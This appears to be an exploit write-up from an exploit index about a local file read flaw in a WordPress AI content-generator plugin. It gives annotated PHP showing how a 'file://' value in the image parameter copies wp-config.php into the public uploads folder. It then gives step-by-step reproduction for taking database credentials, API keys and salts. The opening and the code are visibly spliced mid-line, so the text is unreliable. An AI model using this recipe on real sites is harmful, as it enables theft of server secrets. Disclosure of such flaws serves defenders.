## https://sploitus.com/exploit?id=D8E9CFDD-9218-5948-B327-42691D6B4DD8
# AI Engine for WordPress: ChatGPT, GPT Content Generator true,
'message' => __( 'Data is null!', 'lqdai' ),
] );
}
$args = [
'ID' => $posts['post_id'],
'post_title' => $posts['title'],
'post_content' => $posts['content'],
'post_status' => 'draft',
];
$update_post = wp_update_post( $args );
if ( is_wp_error( $update_post ) ) {
wp_send_json( [
'error' => true,
'message' => $update_post->get_error_messages()
] );
} else {
wp_set_post_tags( $posts['post_id'], $posts['tags'], false );
if ( !empty( $posts['image'] ) ) {
$this->insert_image( $posts['post_id'], $posts['image'] ); // $wp_filetype['type'],
'post_title' => sanitize_file_name(str_replace('.jpg','', $filename)),
'post_content' => '',
'post_status' => 'inherit'
);
$attachment_id = wp_insert_attachment( $attachment, $file, $post_id );
require_once(ABSPATH . 'wp-admin/includes/image.php');
$attachment_data = wp_generate_attachment_metadata( $attachment_id, $file );
wp_update_attachment_metadata( $attachment_id, $attachment_data );
// Set the attachment ID as the featured image for the post
set_post_thumbnail($post_id, $attachment_id);
}
```
### **Path Construction and File Naming**
The vulnerable path construction allows reading local files via the `file://` protocol:
```php
// User provides: 'file:///var/www/html/wp-config.php'
$image_url = 'file:///var/www/html/wp-config.php';
// file_get_contents() reads the file (works by default in PHP)
$image_data = file_get_contents($image_url); // Reads /var/www/html/wp-config.php
// Filename is constructed from the path
$filename = sanitize_file_name(parse_url($image_url)['path']) . '.jpg';
// parse_url() returns '/var/www/html/wp-config.php'
// sanitize_file_name() removes slashes: 'varwwwhtmlwp-config.php'
// Appends '.jpg': 'varwwwhtmlwp-config.php.jpg'
// File is written to uploads directory
$file = $upload_dir['path'] . '/' . $filename;
// Result: /wp-content/uploads/2025/11/varwwwhtmlwp-config.php.jpg
file_put_contents($file, $image_data); // Writes wp-config.php content
```
## Manual Reproduction
1. Login to WordPress as a Contributor (or any user with post editing capabilities).
2. Create a new post draft to obtain a post ID.
3. Use browser developer tools or a tool like Burp Suite to intercept traffic.
4. Intercept a request to `/wp-admin/admin-ajax.php` calling the `lqdai_update_post` action.
5. Modify the request to include a `file://` protocol URL in the `posts[image]` parameter.
6. Send the request with `posts[image]=file:///var/www/html/wp-config.php` to read the WordPress configuration file.
7. Access the file via the uploads directory URL: `/wp-content/uploads/YYYY/MM/varwwwhtmlwp-config.php.jpg`.
8. Extract sensitive configuration files including database credentials, API keys, and security salts.